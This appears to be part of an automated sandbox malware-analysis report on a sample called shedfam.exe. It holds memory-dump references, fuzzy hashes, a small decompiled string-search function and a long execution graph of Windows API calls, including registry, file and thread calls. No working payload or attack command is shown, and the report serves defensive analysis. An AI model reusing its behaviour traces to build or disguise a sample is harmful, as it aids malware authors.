                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\shedfam.exe,C:\Users\user\Desktop\shedfam.exe,80000000,00000003), ref: 00405849
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-1669384263
                                                                  • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                  • Instruction ID: d70a425eade4063b78d7fa64a6a9160d8ae63170ea867be96e5b455a3914fe1f
                                                                  • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                  • Instruction Fuzzy Hash: 01D05E634189A02EE30376509C04B8B6A48CF12340F198462E940A2190C2784C418BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405947(CHAR* _a4, CHAR* _a8) {
                                                                  				int _t10;
                                                                  				int _t15;
                                                                  				CHAR* _t16;
                                                                  
                                                                  				_t15 = lstrlenA(_a8);
                                                                  				_t16 = _a4;
                                                                  				while(lstrlenA(_t16) >= _t15) {
                                                                  					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                  					_t10 = lstrcmpiA(_t16, _a8);
                                                                  					if(_t10 == 0) {
                                                                  						return _t16;
                                                                  					}
                                                                  					_t16 = CharNextA(_t16);
                                                                  				}
                                                                  				return 0;
                                                                  			}






                                                                  0x00405953
                                                                  0x00405955
                                                                  0x0040597d
                                                                  0x00405962
                                                                  0x00405967
                                                                  0x00405972
                                                                  0x00000000
                                                                  0x0040598f
                                                                  0x0040597b
                                                                  0x0040597b
                                                                  0x00000000

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405967
                                                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405975
                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                                                  • Instruction ID: 50b9e356db97d407f8629b59342efd8dd4fdec4619503af860e0f04522e7a9f7
                                                                  • Opcode Fuzzy Hash: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                                                  • Instruction Fuzzy Hash: C1F0A776209D51EFC2026B255C04D7BBF94EF91324B24057BF440F2180D3399815DBBB
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:3.6%
                                                                  Dynamic/Decrypted Code Coverage:4%
                                                                  Signature Coverage:3.7%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:110
                                                                  execution_graph 98229 ed107d 98234 ee2fc5 98229->98234 98231 ed108c 98265 ef2f70 98231->98265 98235 ee2fd5 __ftell_nolock 98234->98235 98268 ee1207 98235->98268 98239 ee3094 98280 ef08c1 98239->98280 98246 ee1207 59 API calls 98247 ee30c5 98246->98247 98299 ee19e1 98247->98299 98249 ee30ce RegOpenKeyExW 98250 f201a3 RegQueryValueExW 98249->98250 98254 ee30f0 Mailbox 98249->98254 98251 f201c0 98250->98251 98252 f20235 RegCloseKey 98250->98252 98303 ef0fe6 98251->98303 98252->98254 98257 f20247 _wcscat Mailbox __wsetenvp 98252->98257 98254->98231 98255 f201d9 98313 ee433f 98255->98313 98257->98254 98262 ee1609 59 API calls 98257->98262 98264 ee4c94 59 API calls 98257->98264 98325 ee1a36 98257->98325 98259 f20201 98316 ee1821 98259->98316 98260 f2021b 98260->98252 98262->98257 98264->98257 98393 ef2e74 98265->98393 98267 ed1096 98269 ef0fe6 Mailbox 59 API calls 98268->98269 98270 ee1228 98269->98270 98271 ef0fe6 Mailbox 59 API calls 98270->98271 98272 ee1236 98271->98272 98273 ef00cf 98272->98273 98329 f01b70 98273->98329 98276 ee1a36 59 API calls 98277 ef0102 98276->98277 98331 ef0284 98277->98331 98279 ef010c Mailbox 98279->98239 98281 f01b70 __ftell_nolock 98280->98281 98282 ef08ce GetFullPathNameW 98281->98282 98283 ef08f0 98282->98283 98284 ee1821 59 API calls 98283->98284 98285 ee309f 98284->98285 98286 ee1900 98285->98286 98287 f1f534 98286->98287 98288 ee1914 98286->98288 98358 ee1c7e 98287->98358 98353 ee18a5 98288->98353 98291 ee191f 98293 ee4c94 98291->98293 98292 f1f53f __wsetenvp _memmove 98294 ee4ca2 98293->98294 98298 ee4cc4 _memmove 98293->98298 98296 ef0fe6 Mailbox 59 API calls 98294->98296 98295 ef0fe6 Mailbox 59 API calls 98297 ee30bc 98295->98297 98296->98298 98297->98246 98298->98295 98300 ee19fb 98299->98300 98302 ee19ee 98299->98302 98301 ef0fe6 Mailbox 59 API calls 98300->98301 98301->98302 98302->98249 98305 ef0fee 98303->98305 98306 ef1008 98305->98306 98308 ef100c std::exception::exception 98305->98308 98361 ef593c 98305->98361 98378 ef35d1 DecodePointer 98305->98378 98306->98255 98379 ef87cb RaiseException 98308->98379 98310 ef1036 98380 ef8701 58 API calls _free 98310->98380 98312 ef1048 98312->98255 98314 ef0fe6 Mailbox 59 API calls 98313->98314 98315 ee4351 RegQueryValueExW 98314->98315 98315->98259 98315->98260 98317 ee189a 98316->98317 98318 ee182d __wsetenvp 98316->98318 98319 ee1981 59 API calls 98317->98319 98320 ee1868 98318->98320 98321 ee1843 98318->98321 98324 ee184b _memmove 98319->98324 98323 ee1c7e 59 API calls 98320->98323 98389 ee1b7c 98321->98389 98323->98324 98324->98260 98326 ee1a45 __wsetenvp _memmove 98325->98326 98327 ef0fe6 Mailbox 59 API calls 98326->98327 98328 ee1a83 98327->98328 98328->98257 98330 ef00dc GetModuleFileNameW 98329->98330 98330->98276 98332 f01b70 __ftell_nolock 98331->98332 98333 ef0291 GetFullPathNameW 98332->98333 98334 ef02cd 98333->98334 98335 ef02b0 98333->98335 98336 ee19e1 59 API calls 98334->98336 98337 ee1821 59 API calls 98335->98337 98338 ef02bc 98336->98338 98337->98338 98341 ee133d 98338->98341 98342 ee134b 98341->98342 98345 ee1981 98342->98345 98344 ee135b 98344->98279 98346 ee198f 98345->98346 98348 ee1998 _memmove 98345->98348 98346->98348 98349 ee1aa4 98346->98349 98348->98344 98350 ee1ab7 98349->98350 98352 ee1ab4 _memmove 98349->98352 98351 ef0fe6 Mailbox 59 API calls 98350->98351 98351->98352 98352->98348 98354 ee18b4 __wsetenvp 98353->98354 98355 ee1c7e 59 API calls 98354->98355 98356 ee18c5 _memmove 98354->98356 98357 f1f4f1 _memmove 98355->98357 98356->98291 98359 ef0fe6 Mailbox 59 API calls 98358->98359 98360 ee1c88 98359->98360 98360->98292 98362 ef59b7 98361->98362 98370 ef5948 98361->98370 98387 ef35d1 DecodePointer 98362->98387 98364 ef59bd 98388 ef8d58 58 API calls __getptd_noexit 98364->98388 98367 ef597b RtlAllocateHeap 98368 ef59af 98367->98368 98367->98370 98368->98305 98370->98367 98371 ef59a3 98370->98371 98372 ef5953 98370->98372 98376 ef59a1 98370->98376 98384 ef35d1 DecodePointer 98370->98384 98385 ef8d58 58 API calls __getptd_noexit 98371->98385 98372->98370 98381 efa39b 58 API calls 2 library calls 98372->98381 98382 efa3f8 58 API calls 7 library calls 98372->98382 98383 ef32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98372->98383 98386 ef8d58 58 API calls __getptd_noexit 98376->98386 98378->98305 98379->98310 98380->98312 98381->98372 98382->98372 98384->98370 98385->98376 98386->98368 98387->98364 98388->98368 98390 ee1b94 98389->98390 98392 ee1b8e 98389->98392 98391 ef0fe6 Mailbox 59 API calls 98390->98391 98391->98392 98392->98324 98394 ef2e80 _doexit 98393->98394 98401 ef3447 98394->98401 98400 ef2ea7 _doexit 98400->98267 98418 ef9e3b 98401->98418 98403 ef2e89 98404 ef2eb8 RtlDecodePointer DecodePointer 98403->98404 98405 ef2ee5 98404->98405 98406 ef2e95 98404->98406 98405->98406 98470 ef89d4 59 API calls ___strgtold12_l 98405->98470 98415 ef2eb2 98406->98415 98408 ef2f48 EncodePointer EncodePointer 98408->98406 98409 ef2ef7 98409->98408 98410 ef2f1c 98409->98410 98471 ef8a94 61 API calls 2 library calls 98409->98471 98410->98406 98414 ef2f36 EncodePointer 98410->98414 98472 ef8a94 61 API calls 2 library calls 98410->98472 98413 ef2f30 98413->98406 98413->98414 98414->98408 98473 ef3450 98415->98473 98419 ef9e5f EnterCriticalSection 98418->98419 98420 ef9e4c 98418->98420 98419->98403 98425 ef9ec3 98420->98425 98422 ef9e52 98422->98419 98449 ef32e5 58 API calls 3 library calls 98422->98449 98426 ef9ecf _doexit 98425->98426 98427 ef9ed8 98426->98427 98428 ef9ef0 98426->98428 98450 efa39b 58 API calls 2 library calls 98427->98450 98436 ef9f11 _doexit 98428->98436 98453 ef8a4d 98428->98453 98431 ef9edd 98451 efa3f8 58 API calls 7 library calls 98431->98451 98434 ef9f0c 98459 ef8d58 58 API calls __getptd_noexit 98434->98459 98435 ef9f1b 98439 ef9e3b __lock 58 API calls 98435->98439 98436->98422 98437 ef9ee4 98452 ef32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98437->98452 98441 ef9f22 98439->98441 98443 ef9f2f 98441->98443 98444 ef9f47 98441->98444 98460 efa05b InitializeCriticalSectionAndSpinCount 98443->98460 98461 ef2f85 98444->98461 98447 ef9f3b 98467 ef9f63 LeaveCriticalSection _doexit 98447->98467 98450->98431 98451->98437 98456 ef8a5b 98453->98456 98454 ef593c std::exception::_Copy_str 58 API calls 98454->98456 98455 ef8a8d 98455->98434 98455->98435 98456->98454 98456->98455 98457 ef8a6e 98456->98457 98457->98455 98457->98456 98468 efa362 Sleep 98457->98468 98459->98436 98460->98447 98462 ef2f8e RtlFreeHeap 98461->98462 98463 ef2fb7 __dosmaperr 98461->98463 98462->98463 98464 ef2fa3 98462->98464 98463->98447 98469 ef8d58 58 API calls __getptd_noexit 98464->98469 98466 ef2fa9 GetLastError 98466->98463 98467->98436 98468->98457 98469->98466 98470->98409 98471->98410 98472->98413 98476 ef9fa5 LeaveCriticalSection 98473->98476 98475 ef2eb7 98475->98400 98476->98475 98477 edab1f 98478 edab6e 98477->98478 98479 edab24 98477->98479 98482 ee1207 59 API calls 98478->98482 98480 ee1207 59 API calls 98479->98480 98481 edab30 98480->98481 98483 ee1207 59 API calls 98481->98483 98484 edac39 98482->98484 98483->98478 98502 ef0588 98484->98502 98488 edac6b 98489 ee1207 59 API calls 98488->98489 98490 edac75 98489->98490 98530 eefe2b 98490->98530 98492 edacbc 98493 edaccc GetStdHandle 98492->98493 98494 edad18 98493->98494 98495 f12f39 98493->98495 98496 edad20 OleInitialize 98494->98496 98495->98494 98497 f12f42 98495->98497 98537 f370f3 64 API calls Mailbox 98497->98537 98499 f12f49 98538 f377c2 CreateThread 98499->98538 98501 f12f55 CloseHandle 98501->98496 98503 ee1207 59 API calls 98502->98503 98504 ef0598 98503->98504 98505 ee1207 59 API calls 98504->98505 98506 ef05a0 98505->98506 98539 ee10c3 98506->98539 98509 ee10c3 59 API calls 98510 ef05b0 98509->98510 98511 ee1207 59 API calls 98510->98511 98512 ef05bb 98511->98512 98513 ef0fe6 Mailbox 59 API calls 98512->98513 98514 edac43 98513->98514 98515 eeff4c 98514->98515 98516 eeff5a 98515->98516 98517 ee1207 59 API calls 98516->98517 98518 eeff65 98517->98518 98519 ee1207 59 API calls 98518->98519 98520 eeff70 98519->98520 98521 ee1207 59 API calls 98520->98521 98522 eeff7b 98521->98522 98523 ee1207 59 API calls 98522->98523 98524 eeff86 98523->98524 98525 ee10c3 59 API calls 98524->98525 98526 eeff91 98525->98526 98527 ef0fe6 Mailbox 59 API calls 98526->98527 98528 eeff98 RegisterWindowMessageW 98527->98528 98528->98488 98531 eefe3b 98530->98531 98532 f2620c 98530->98532 98534 ef0fe6 Mailbox 59 API calls 98531->98534 98542 f3a12a 59 API calls 98532->98542 98536 eefe43 98534->98536 98535 f26217 98536->98492 98537->98499 98538->98501 98540 ee1207 59 API calls 98539->98540 98541 ee10cb 98540->98541 98541->98509 98542->98535 98543 ed9b8b 98546 ed86e0 98543->98546 98547 ed86fd 98546->98547 98548 f10ff8 98547->98548 98549 f10fad 98547->98549 98570 ed8724 98547->98570 98618 f4aad0 284 API calls __cinit 98548->98618 98552 f10fb5 98549->98552 98556 f10fc2 98549->98556 98549->98570 98616 f4b0e4 284 API calls 98552->98616 98553 ef2f70 __cinit 67 API calls 98553->98570 98571 ed898d 98556->98571 98617 f4b58c 284 API calls 3 library calls 98556->98617 98557 ed3f42 68 API calls 98557->98570 98558 f11289 98558->98558 98559 ed3c30 68 API calls 98559->98570 98561 f111af 98625 f4ae3b 89 API calls 98561->98625 98564 ed8a17 98570->98553 98570->98557 98570->98559 98570->98561 98570->98564 98570->98571 98575 ed53b0 98570->98575 98603 ed5278 98570->98603 98608 ed39be 98570->98608 98612 ed3938 68 API calls 98570->98612 98613 ed855e 284 API calls 98570->98613 98614 ed84e2 89 API calls 98570->98614 98615 ed835f 284 API calls 98570->98615 98619 ed523c 59 API calls 98570->98619 98620 f273ab 59 API calls 98570->98620 98621 ee1c9c 98570->98621 98571->98564 98626 f3a48d 89 API calls 4 library calls 98571->98626 98576 ed53cf 98575->98576 98599 ed53fd Mailbox 98575->98599 98577 ef0fe6 Mailbox 59 API calls 98576->98577 98577->98599 98578 ef2f70 67 API calls __cinit 98578->98599 98579 ed69fa 98580 ee1c9c 59 API calls 98579->98580 98598 ed5569 Mailbox 98580->98598 98581 ed69ff 98582 f0e691 98581->98582 98583 f0f165 98581->98583 98687 f3a48d 89 API calls 4 library calls 98582->98687 98691 f3a48d 89 API calls 4 library calls 98583->98691 98587 ee1c9c 59 API calls 98587->98599 98588 ef0fe6 59 API calls Mailbox 98588->98599 98589 f0e6a0 98589->98570 98590 f0ea9a 98592 ee1c9c 59 API calls 98590->98592 98592->98598 98593 ee1207 59 API calls 98593->98599 98595 f0eb67 98595->98598 98688 f27aad 59 API calls 98595->98688 98596 f27aad 59 API calls 98596->98599 98598->98570 98599->98578 98599->98579 98599->98581 98599->98582 98599->98587 98599->98588 98599->98590 98599->98593 98599->98595 98599->98596 98599->98598 98600 f0ef28 98599->98600 98602 ed5a1a 98599->98602 98627 ed7e50 98599->98627 98686 ed6e30 60 API calls Mailbox 98599->98686 98689 f3a48d 89 API calls 4 library calls 98600->98689 98690 f3a48d 89 API calls 4 library calls 98602->98690 98604 ef0fe6 Mailbox 59 API calls 98603->98604 98605 ed5285 98604->98605 98606 ee1a36 59 API calls 98605->98606 98607 ed5294 98605->98607 98606->98607 98607->98570 98609 ed39c9 98608->98609 98610 ed39f0 98609->98610 99329 ed3ea3 68 API calls Mailbox 98609->99329 98610->98570 98612->98570 98613->98570 98614->98570 98615->98570 98616->98556 98617->98571 98618->98570 98619->98570 98620->98570 98622 ee1caf 98621->98622 98623 ee1ca7 98621->98623 98622->98570 98624 ee1bcc 59 API calls 98623->98624 98624->98622 98625->98571 98626->98558 98628 ed7e79 98627->98628 98644 ed7ef2 98627->98644 98629 f10adf 98628->98629 98633 ed7e90 98628->98633 98639 f10b09 98628->98639 98725 f4cdc8 284 API calls 2 library calls 98629->98725 98630 f109e9 98632 f10ad3 98630->98632 98657 ed7eb8 Mailbox 98630->98657 98679 ed8022 Mailbox 98630->98679 98723 f4ccac 284 API calls 98630->98723 98724 f3a48d 89 API calls 4 library calls 98632->98724 98637 f10c37 98633->98637 98648 ed7ea1 98633->98648 98633->98657 98634 ed53b0 284 API calls 98634->98644 98640 ee1c9c 59 API calls 98637->98640 98638 f109e1 98722 ed5190 59 API calls Mailbox 98638->98722 98643 f10b3d 98639->98643 98645 f10b21 98639->98645 98640->98657 98641 ed806a 98641->98599 98643->98629 98692 f4a8fd 98643->98692 98644->98630 98644->98634 98644->98638 98644->98641 98665 ed8015 98644->98665 98670 ed7fb2 98644->98670 98726 f3a48d 89 API calls 4 library calls 98645->98726 98648->98657 98730 f27aad 59 API calls 98648->98730 98649 f10d0b 98655 f10d41 98649->98655 98751 f4c9c9 95 API calls Mailbox 98649->98751 98651 f10a33 98654 ee1c9c 59 API calls 98651->98654 98652 f10bb7 98727 f37ed5 59 API calls 98652->98727 98654->98657 98753 ed523c 59 API calls 98655->98753 98657->98649 98663 ed7ee7 98657->98663 98731 f4c87c 85 API calls 2 library calls 98657->98731 98661 f10ce9 98732 ed4d37 98661->98732 98662 f10d1f 98666 ed4d37 84 API calls 98662->98666 98663->98599 98665->98679 98721 f3a48d 89 API calls 4 library calls 98665->98721 98671 f10d27 __wsetenvp 98666->98671 98667 f10b6b 98699 f3789a 98667->98699 98669 f10cf1 __wsetenvp 98669->98649 98750 ed523c 59 API calls 98669->98750 98670->98665 98719 ed4230 59 API calls Mailbox 98670->98719 98671->98655 98752 ed523c 59 API calls 98671->98752 98673 f10bc9 98728 ee35b9 59 API calls Mailbox 98673->98728 98678 f10bd2 Mailbox 98683 f3789a 59 API calls 98678->98683 98679->98651 98679->98657 98720 f27aad 59 API calls 98679->98720 98684 f10beb 98683->98684 98729 edb020 284 API calls 2 library calls 98684->98729 98686->98599 98687->98589 98688->98598 98689->98602 98690->98598 98691->98598 98693 f4a918 98692->98693 98698 f10b53 98692->98698 98694 ef0fe6 Mailbox 59 API calls 98693->98694 98697 f4a93a 98694->98697 98695 ef0fe6 Mailbox 59 API calls 98695->98697 98697->98695 98697->98698 98754 f2715b 59 API calls Mailbox 98697->98754 98698->98652 98698->98667 98700 f378ac 98699->98700 98701 f10b8d 98699->98701 98700->98701 98702 ef0fe6 Mailbox 59 API calls 98700->98702 98703 f26ebc 98701->98703 98702->98701 98704 f26f06 98703->98704 98708 f26f1c Mailbox 98703->98708 98705 ee1a36 59 API calls 98704->98705 98705->98708 98706 f26f47 98780 f4c355 284 API calls Mailbox 98706->98780 98707 f26f5a 98755 eda820 98707->98755 98708->98706 98708->98707 98712 f27002 98712->98630 98713 f26f91 98714 f26fdc 98713->98714 98715 f26f53 98713->98715 98717 f26fc1 98713->98717 98714->98715 98781 f3a48d 89 API calls 4 library calls 98714->98781 98782 f26cf1 59 API calls Mailbox 98715->98782 98772 f2706d 98717->98772 98719->98665 98720->98679 98721->98638 98722->98630 98723->98630 98724->98629 98725->98657 98726->98663 98727->98673 98728->98678 98729->98630 98730->98657 98731->98661 98733 ed4d4b 98732->98733 98734 ed4d51 98732->98734 98733->98669 98735 f0db28 __i64tow 98734->98735 98736 ed4d99 98734->98736 98737 ed4d57 __itow 98734->98737 98741 f0da2f 98734->98741 99327 ef38c8 83 API calls 3 library calls 98736->99327 98740 ef0fe6 Mailbox 59 API calls 98737->98740 98742 ed4d71 98740->98742 98743 ef0fe6 Mailbox 59 API calls 98741->98743 98745 f0daa7 Mailbox _wcscpy 98741->98745 98742->98733 98744 ee1a36 59 API calls 98742->98744 98746 f0da74 98743->98746 98744->98733 99328 ef38c8 83 API calls 3 library calls 98745->99328 98747 ef0fe6 Mailbox 59 API calls 98746->98747 98748 f0da9a 98747->98748 98748->98745 98749 ee1a36 59 API calls 98748->98749 98749->98745 98750->98649 98751->98662 98752->98655 98753->98663 98754->98697 98756 f12d51 98755->98756 98759 eda84c 98755->98759 98784 f3a48d 89 API calls 4 library calls 98756->98784 98758 f12d62 98758->98713 98760 f12d6a 98759->98760 98768 eda888 _memmove 98759->98768 98785 f3a48d 89 API calls 4 library calls 98760->98785 98763 ef0fe6 59 API calls Mailbox 98763->98768 98764 f12dae 98786 eda9de 284 API calls 98764->98786 98766 ed53b0 284 API calls 98766->98768 98767 f12dc8 98769 eda975 98767->98769 98787 f3a48d 89 API calls 4 library calls 98767->98787 98768->98763 98768->98764 98768->98766 98768->98767 98768->98769 98770 eda962 98768->98770 98769->98713 98770->98769 98783 f4a9c3 85 API calls Mailbox 98770->98783 98773 f27085 98772->98773 98774 f270d9 98773->98774 98788 edd679 98773->98788 98828 f5277f 98773->98828 98866 f3d6be 98773->98866 98913 f4e60c 98773->98913 98916 ee3df7 98773->98916 98774->98715 98780->98715 98781->98715 98782->98712 98783->98769 98784->98758 98785->98769 98786->98767 98787->98769 98925 ed4f98 98788->98925 98792 ef0fe6 Mailbox 59 API calls 98793 edd6aa 98792->98793 98794 edd6ba 98793->98794 98797 ee3df7 60 API calls 98793->98797 98798 ed4d37 84 API calls 98794->98798 98795 f15068 98796 edd6df 98795->98796 98991 f3fbb7 59 API calls 98795->98991 98803 edd6ec 98796->98803 98992 ed502b 59 API calls 98796->98992 98797->98794 98799 edd6c8 98798->98799 98972 ee3e47 98799->98972 98801 f150b0 98801->98803 98804 f150b8 98801->98804 98938 ee41d6 98803->98938 98993 ed502b 59 API calls 98804->98993 98809 edd6f3 98810 edd70d 98809->98810 98811 f150ca 98809->98811 98812 ee1207 59 API calls 98810->98812 98813 ef0fe6 Mailbox 59 API calls 98811->98813 98814 edd715 98812->98814 98815 f150d0 98813->98815 98943 ee3bc3 98814->98943 98817 f150e4 98815->98817 98994 ee3ea1 ReadFile SetFilePointerEx 98815->98994 98822 f150e8 _memmove 98817->98822 98995 f37c7f 59 API calls 2 library calls 98817->98995 98818 edd724 98818->98822 98966 ed4f3c 98818->98966 98823 edd738 Mailbox 98824 edd772 98823->98824 98985 ee42cf 98823->98985 98824->98774 98829 ee1207 59 API calls 98828->98829 98830 f52796 98829->98830 98831 ed4d37 84 API calls 98830->98831 98832 f527a5 98831->98832 99095 ee162d 98832->99095 98835 ed4d37 84 API calls 98836 f527c5 98835->98836 98837 f52853 98836->98837 98838 f527df 98836->98838 98839 ed4d37 84 API calls 98837->98839 99123 ed502b 59 API calls 98838->99123 98841 f52858 98839->98841 98843 f52884 98841->98843 98844 f52866 98841->98844 98842 f527e4 98845 f52842 98842->98845 98849 f527fb 98842->98849 98846 f52899 98843->98846 99146 ed502b 59 API calls 98843->99146 98848 ed4f98 59 API calls 98844->98848 98847 ed4f98 59 API calls 98845->98847 98856 f528ae 98846->98856 99147 ed502b 59 API calls 98846->99147 98865 f5284f Mailbox 98847->98865 98848->98865 99124 ee1462 98849->99124 98854 f52808 99137 ee17e0 98854->99137 99100 ee1bcc 98856->99100 98857 f528c8 99104 f2fb9d 98857->99104 98860 ee1462 59 API calls 98861 f5282f 98860->98861 98862 ee17e0 59 API calls 98861->98862 98864 f5283d 98862->98864 98863 ed4f3c 59 API calls 98863->98865 98864->98863 98865->98774 98867 f3d6dd 98866->98867 98870 f3d6e8 98866->98870 99164 ed502b 59 API calls 98867->99164 98869 ef0fe6 Mailbox 59 API calls 98871 f3d80b 98869->98871 98872 ee1207 59 API calls 98870->98872 98911 f3d7c2 Mailbox 98870->98911 98873 f3d817 98871->98873 98875 ee3df7 60 API calls 98871->98875 98874 f3d70c 98872->98874 98877 ed4d37 84 API calls 98873->98877 98876 ee1207 59 API calls 98874->98876 98875->98873 98878 f3d715 98876->98878 98879 f3d82f 98877->98879 98880 ed4d37 84 API calls 98878->98880 98881 ee3e47 67 API calls 98879->98881 98882 f3d721 98880->98882 98883 f3d83e 98881->98883 99165 ef0119 98882->99165 98885 f3d842 GetLastError 98883->98885 98886 f3d876 98883->98886 98888 f3d85b 98885->98888 98890 f3d8a1 98886->98890 98891 f3d8d8 98886->98891 98887 f3d736 98889 ee17e0 59 API calls 98887->98889 98908 f3d7cb Mailbox 98888->98908 99219 ee3f0b CloseHandle 98888->99219 98892 f3d769 98889->98892 98895 ef0fe6 Mailbox 59 API calls 98890->98895 98894 ef0fe6 Mailbox 59 API calls 98891->98894 98893 f3d7bb 98892->98893 99216 f3412a GetFileAttributesW FindFirstFileW FindClose 98892->99216 99218 ed502b 59 API calls 98893->99218 98897 f3d8dd 98894->98897 98898 f3d8a6 98895->98898 98904 ee1207 59 API calls 98897->98904 98897->98908 98902 f3d8b7 98898->98902 98905 ee1207 59 API calls 98898->98905 98901 f3d779 98901->98893 98903 f3d77d 98901->98903 99220 f3fc0d 59 API calls 2 library calls 98902->99220 98907 ee1a36 59 API calls 98903->98907 98904->98908 98905->98902 98909 f3d78a 98907->98909 98908->98774 99217 f33f1d 63 API calls Mailbox 98909->99217 98911->98869 98911->98908 98912 f3d793 Mailbox 98912->98893 99225 f4d1c6 98913->99225 98915 f4e61c 98915->98774 98917 ef0fe6 Mailbox 59 API calls 98916->98917 98918 ee3e07 98917->98918 98919 ee42cf CloseHandle 98918->98919 98920 ee3e12 98919->98920 98921 ee1207 59 API calls 98920->98921 98922 ee3e1a 98921->98922 98923 ee42cf CloseHandle 98922->98923 98924 ee3e21 98923->98924 98924->98774 98926 f0dd2b 98925->98926 98928 ed4fa8 98925->98928 98929 ee1821 59 API calls 98926->98929 98930 f0dd3c 98926->98930 98927 ee19e1 59 API calls 98931 f0dd46 98927->98931 98932 ef0fe6 Mailbox 59 API calls 98928->98932 98929->98930 98930->98927 98935 ed4fd4 98931->98935 98936 ee1207 59 API calls 98931->98936 98933 ed4fbb 98932->98933 98933->98931 98934 ed4fc6 98933->98934 98934->98935 98937 ee1a36 59 API calls 98934->98937 98935->98792 98935->98795 98936->98935 98937->98935 98996 ee410a 98938->98996 98941 ee410a 2 API calls 98942 ee420b 98941->98942 98942->98809 98944 ee3bce 98943->98944 98945 ee3bf3 98943->98945 98944->98945 98948 ee3bdd 98944->98948 98946 ee19e1 59 API calls 98945->98946 98953 f33751 98946->98953 98947 ee3b7b 99006 ee40cd 98947->99006 98948->98947 98950 ee3bed 98948->98950 98949 f33780 98949->98818 98955 ee40cd 59 API calls 98950->98955 98953->98949 99025 f336ed ReadFile SetFilePointerEx 98953->99025 99026 ee153b 59 API calls 2 library calls 98953->99026 98958 f33871 98955->98958 98960 ee3b23 61 API calls 98958->98960 98961 f3387f 98960->98961 98965 f3388f Mailbox 98961->98965 99027 ee13f1 61 API calls Mailbox 98961->99027 98964 ee3bab Mailbox 98964->98818 98965->98818 98967 ed4f48 98966->98967 98968 ed4f87 98966->98968 98971 ef0fe6 Mailbox 59 API calls 98967->98971 98969 ee1c9c 59 API calls 98968->98969 98970 ed4f5b 98969->98970 98970->98823 98971->98970 98973 ee42cf CloseHandle 98972->98973 98974 ee3e53 98973->98974 99068 ee42f9 98974->99068 98976 edd6d7 98976->98795 98976->98796 98990 ee3f0b CloseHandle 98976->98990 98977 ee3e72 98977->98976 99076 ee3c61 98977->99076 98979 ee3e84 99093 ee389f SetFilePointerEx SetFilePointerEx 98979->99093 98981 f205ab 99094 f3394d SetFilePointerEx SetFilePointerEx WriteFile 98981->99094 98982 ee3e8b 98982->98976 98982->98981 98984 f205db 98984->98976 98986 ee42e8 98985->98986 98987 edd766 98985->98987 98986->98987 98988 ee42ed CloseHandle 98986->98988 98987->98824 98989 ee3f0b CloseHandle 98987->98989 98988->98987 98989->98824 98990->98795 98991->98795 98992->98801 98993->98809 98994->98817 98995->98822 99003 ee4124 98996->99003 98997 ee41ab SetFilePointerEx 99004 ee42ae SetFilePointerEx 98997->99004 98998 f206cc 99005 ee42ae SetFilePointerEx 98998->99005 99001 ee417f 99001->98941 99002 f206e6 